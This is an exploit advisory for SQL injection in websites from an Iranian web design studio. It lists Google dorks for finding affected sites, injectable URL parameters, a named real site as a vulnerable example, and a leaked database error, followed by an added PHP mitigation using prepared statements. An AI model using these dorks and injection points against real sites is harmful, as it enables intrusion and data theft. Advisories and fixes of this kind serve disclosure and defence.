##############################################################################################################
# Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : media-art.ir ~ haayahoo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
##############################################################################################################
# Google Dorks :
intext:''طراحی و اجرا: هنر رسانه''
intext:''مجری سایت: هنررسانه''
intext:''طراحی و توسعه هیاهـو''
# SQL Injection Exploits :
/newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection]
/news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?newsid=[SQL Injection]
/newspaper/engine/print.php?newsid=[SQL Injection]
/index.php?newsid=[SQL Injection]
##############################################################################################################
# Example Vulnerable Site =>
jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL] => [ Proof of Concept ] => archive.is/YXXPC
# SQL Database Error =>
MySQL error in file: /engine/modules/show.short.php at line 65
Error Number: 1064
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1
SQL query:
SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title,
p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num,
e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id)
WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date
< '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1
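# Mitigation Example (added here; not part of the original advisory or the vendor's code) :
The error output above shows the category value concatenated unquoted into the WHERE clause (category= AND ...); the code below runs the same kind of listing query with strict input validation and bound parameters. The function name fetch_posts_for_day, the integer-only category rule, the reduced column list and the in-memory SQLite table with its sample row are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not the application's own code. It runs the listing
// query from the error output with bound parameters instead of concatenation.
function fetch_posts_for_day(PDO $db, string $day, $rawCategory): array
{
    // Assumption: category is a positive integer id. Reject everything else
    // (empty string, text, mixed input) before any SQL is built.
    $category = filter_var($rawCategory, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($category === false) {
        throw new InvalidArgumentException('category must be a positive integer');
    }
    // The day must be a real calendar date in YYYY-MM-DD form.
    $start = DateTimeImmutable::createFromFormat('!Y-m-d', $day);
    if ($start === false || $start->format('Y-m-d') !== $day) {
        throw new InvalidArgumentException('day must be YYYY-MM-DD');
    }
    $stmt = $db->prepare(
        'SELECT p.id, p.title, p.category FROM dle_post p
          WHERE p.date >= :start AND p.date < :end
            AND p.category = :category AND p.approve = 1
          ORDER BY p.date DESC LIMIT 1'
    );
    $stmt->bindValue(':start', $day);
    $stmt->bindValue(':end', $start->modify('+1 day')->format('Y-m-d'));
    $stmt->bindValue(':category', $category, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed test data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dle_post (id INTEGER PRIMARY KEY, title TEXT,
           category INTEGER, date TEXT, approve INTEGER)');
$db->exec("INSERT INTO dle_post VALUES (1, 'constructed row', 3, '2017-04-17 10:00:00', 1)");

// '3' is a valid id; '' reproduces the empty value seen in the error output.
foreach (['3', '', 'abc'] as $input) {
    try {
        $rows = fetch_posts_for_day($db, '2017-04-17', $input);
        printf("category=%s -> %d row(s)\n", var_export($input, true), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("category=%s -> rejected: %s\n", var_export($input, true), $e->getMessage());
    }
}
```

On MySQL, create the PDO connection with PDO::ATTR_EMULATE_PREPARES set to false so parameters are bound server-side, and log database errors on the server rather than returning the file path and full query to the client as the output above does.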
##############################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################